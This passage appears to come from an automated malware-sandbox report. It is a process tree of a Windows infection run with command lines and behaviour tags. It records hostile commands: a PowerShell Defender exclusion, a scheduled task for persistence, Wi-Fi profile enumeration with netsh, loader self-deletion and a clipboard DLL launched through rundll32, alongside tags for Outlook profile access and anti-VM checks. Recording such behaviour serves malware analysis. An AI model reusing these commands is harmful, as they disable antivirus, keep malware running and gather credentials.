                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:5420
                                                                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:2192
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000242001\loader.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000242001\loader.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Accesses Microsoft Outlook profiles
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  • outlook_office_path
                                                                                                                                                                                  • outlook_win_path
                                                                                                                                                                                  PID:5728
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    svchost.exe
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5812
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1860
                                                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                                                          chcp 65001
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:2544
                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                            netsh wlan show profiles
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:1748
                                                                                                                                                                                            • C:\Windows\system32\findstr.exe
                                                                                                                                                                                              findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:3312
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4952
                                                                                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                                                                                  chcp 65001
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:3096
                                                                                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                    netsh wlan show networks mode=bssid
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:5624
                                                                                                                                                                                                    • C:\Windows\system32\findstr.exe
                                                                                                                                                                                                      findstr "SSID BSSID Signal"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:5540
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\1000242001\loader.exe"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5256
                                                                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                                                                          chcp 65001
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:2956
                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                            timeout /t 3
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                            PID:1116
                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:5848
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:2828
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2712 -ip 2712
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:3684
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4328 -ip 4328
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:456
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 328 -ip 328
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1068
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5460 -ip 5460
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5996
                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:1608
                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:2808
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2888
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:2016
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:1028
                                                                                                                                                                                                                      • C:\Windows\windefender.exe
                                                                                                                                                                                                                        C:\Windows\windefender.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1028
                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:6032
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --run-assistant --allusers=0
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:2532
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x250,0x254,0x258,0x230,0x25c,0xa26038,0xa26044,0xa26050
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:1468
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:1800
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --stream
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:6116
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b4,0x2b8,0x2bc,0x2b0,0x2c0,0x7ff994ade650,0x7ff994ade660,0x7ff994ade670
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:5820
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --show-intro-overlay --start-maximized --lowered-browser
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:6760
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2ac,0x2b0,0x2b4,0x2a8,0x2b8,0x7ff994ade650,0x7ff994ade660,0x7ff994ade670
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:6796
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1884,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=1880 /prefetch:2
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:6996
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2004,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:3
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:7016
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2292,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=2476 /prefetch:8
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:7116
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2704,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3088 /prefetch:8
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:3096
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=3080,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3140 /prefetch:8
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:6160
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=3096,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3256 /prefetch:8
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:5708
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=3112,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3372 /prefetch:8
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:3384
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=3120,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:8
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:5504
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3788,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3800 /prefetch:1
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:6344
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
